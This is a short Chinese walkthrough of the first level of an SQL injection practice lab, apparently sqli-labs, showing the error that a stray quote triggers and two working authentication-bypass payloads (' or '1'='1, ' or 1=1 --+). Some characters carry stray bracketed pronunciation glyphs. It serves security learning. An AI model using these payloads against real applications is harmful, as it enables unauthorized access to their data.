Less-1：GET-Error based-Single quotes-String

第一節(jié)：GET – 基于錯(cuò)誤 – 單引號(hào) – 字符型

這里提示:輸入一個(gè)數(shù)值型的“id”作為參數(shù)

比如使用：
?id=1加入到url后面,變成->localhost/Less-1/?id=1
可正常查詢(xún)到一條記錄:

根據(jù)源碼，index.php第29行，可以知道這里使用的查詢(xún)語(yǔ)句為：
SELECT * FROM users WHERE id='$id' LIMIT 0,1這里$id是被單引號(hào)包裹的。
使用id=1'進(jìn)行查詢(xún)驗(yàn)證，得到報(bào)錯(cuò)：
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

所以以下兩個(gè)注入可以測(cè)試成功：
' or '1'='1
' or 1=1 --+
會(huì)自動(dòng)返回第一條數(shù)據(jù)

tips:

查詢(xún)語(yǔ)句中l(wèi)imit的意思是：
(格式：limit 第幾條，一共幾條）
select * from tablename limit 0,1即取出第一條記錄
select * from tablename limit 1,1第二條記錄
select * from tablename limit 10,20從第11條到31條（共計(jì)20條）